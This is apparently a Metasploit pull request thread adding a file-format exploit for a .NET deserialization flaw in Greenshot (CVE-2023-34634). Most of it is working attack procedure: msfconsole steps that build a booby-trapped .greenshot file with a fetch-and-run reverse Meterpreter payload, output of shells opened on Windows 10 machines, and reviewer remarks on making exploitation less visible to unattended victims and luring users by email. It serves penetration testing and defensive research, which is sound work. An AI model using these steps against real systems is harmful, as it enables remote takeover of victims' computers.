Add CVE-2023-34634, Greenshot Fileformat exploit

[bwatters-r7]

This is not working currently and is a placeholder.
This PR adds a fileformat exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6

Verification

• Start msfconsole
• use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
• set payload cmd/windows/http/x64/meterpreter/reverse_tcp
• set FETCH_SRVHOST 10.5.135.201
• set LHOST 10.5.135.201
• set FETCH_WRITABLE_DIR %TEMP%
• set DisablePayloadHandler false
• set wfsdelay 600
• run
• copy the file over to the target machine, ensuring that the '.greenshot` extension is preserved
• double click on the file
• Collect shells

msf6 > use exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634
[*] No payload configured, defaulting to cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set payload cmd/windows/http/x64/meterpreter/reverse_tcp
payload => cmd/windows/http/x64/meterpreter/reverse_tcp
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_SRVHOST 10.5.135.201
FETCH_SRVHOST => 10.5.135.201
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set LHOST 10.5.135.201
LHOST => 10.5.135.201
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set FETCH_WRITABLE_DIR %TEMP%
FETCH_WRITABLE_DIR => %TEMP%
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > set wfsdelay 600
wfsdelay => 600
msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > show options

Module options (exploit/windows/fileformat/greenshot_deserialize_cve_2023_34634):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME                   no        The file name.
   PNG_FILE                   no        PNG file to use


Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   EXITFUNC            process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, TFTP, CERTUTIL)
   FETCH_DELETE        false            yes       Attempt to delete the binary after execution
   FETCH_FILENAME      tsuAqVhW         no        Name to use on remote system when storing payload; cannot contain spaces.
   FETCH_SRVHOST       10.5.135.201     yes       Local IP to use for serving payload
   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
   FETCH_URIPATH                        no        Local URI to use for serving payload
   FETCH_WRITABLE_DIR  %TEMP%           yes       Remote writable dir to store payload; cannot contain spaces.
   LHOST               10.5.135.201     yes       The listen address (an interface may be specified)
   LPORT               4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[+] QsMBQrLmW.greenshot stored at /home/tmoose/.msf4/local/QsMBQrLmW.greenshot
[*] Sending stage (200774 bytes) to 10.5.132.130
[*] Meterpreter session 1 opened (10.5.135.201:4444 -> 10.5.132.130:50221) at 2023-08-03 18:27:21 -0500

meterpreter > sysinfo
Computer        : DESKTOP-KAI0M8D
OS              : Windows 10 (10.0 Build 19041).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: DESKTOP-KAI0M8D\msfuser

[cgranleese-r7]

Tested this against Windows 10 and everything worked great 👍

Output:

msf6 exploit(windows/fileformat/greenshot_deserialize_cve_2023_34634) > run

[*] Started reverse TCP handler on <lhost>:4444
[+] dWTxngq.greenshot stored at /Users/cgranleese/.msf4/local/dWTxngq.greenshot
[*] Sending stage (200774 bytes) to <lhost>
[*] Meterpreter session 1 opened (<lhost>:4444 -> <lhost>:54362) at 2023-08-17 10:17:26 +0100

meterpreter > sysinfo
Computer        : DESKTOP-DRQ7J9D
OS              : Windows 10 (10.0 Build 19042).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

One thing I thought was worth mentioning was that once a target machine is exploited, it leaves a beautiful but rather large and obvious picture 😄 :

Just thinking would we be better will an empty/1px image. Obviously if a user is sitting at the machine, they'll see the application regardless. Just thinking of the scenario where machine is exploited while unattended. The current image could be seen across a room/office floor, whereas a smaller image wouldn't be as easy to spot. Just curious if you have any thoughts on that?

[bwatters-r7]

Just thinking would we be better will an empty/1px image. Obviously if a user is sitting at the machine, they'll see the application regardless. Just thinking of the scenario where machine is exploited while unattended. The current image could be seen across a room/office floor, whereas a smaller image wouldn't be as easy to spot. Just curious if you have any thoughts on that?

I think the use case most likely here is to infect a greenshot image on a share drive or as an attachment. Even if we used a 1 px image, the application itself would still be open, and then it would be an empty image that I think would be more concerting. I included an image mostly just for testing purposes, though emailing it to me and saying "Look at this cute dog" might just get me.

[adfoster-r7]

Looks good to me; The image itself is the exploit - rather than a byproduct/side-effect that shows to the user

[cgranleese-r7]

Happy to land once all goes green 👍

[cgranleese-r7]

Release Notes

This PR adds a file-format exploit affecting Greenshot versions 1.3.274 and earlier, including the last stable release, 1.2.10.6.

[AkechiShiro]

@cgranleese-r7 could you test the latest unstable release from Greenshot, is that one also vulnerable ??
I saw a fix for what I believe is another security issue (not sure) : https://greenshot.atlassian.net/browse/SUPPORT-407 but that one might be different than CVE-2023-34634, just trying to make sure if the exploit is still possible on 1.3.277 or not

[bwatters-r7]

@AkechiShiro, please see the documentation and description of the module:

There exists a .NET deserialization vulnerability in Greenshot version 1.3.274 and below.

I did not do an analysis to determine if there's a workaround or why the vulnerability is patched, but I was not able to get this exploit to work on anything newer than 1.3.274

[AkechiShiro]

@bwatters-r7 I'm sorry, but I've gotten really confused with the way releases/changelog and security fixes are handled by Greenshot.
I will check more thoroughly, the doc next time, maybe if the template was more standard such as :

version affected : 
version fixed :

It would be easier, just at a glance to know, which version is fixed or not.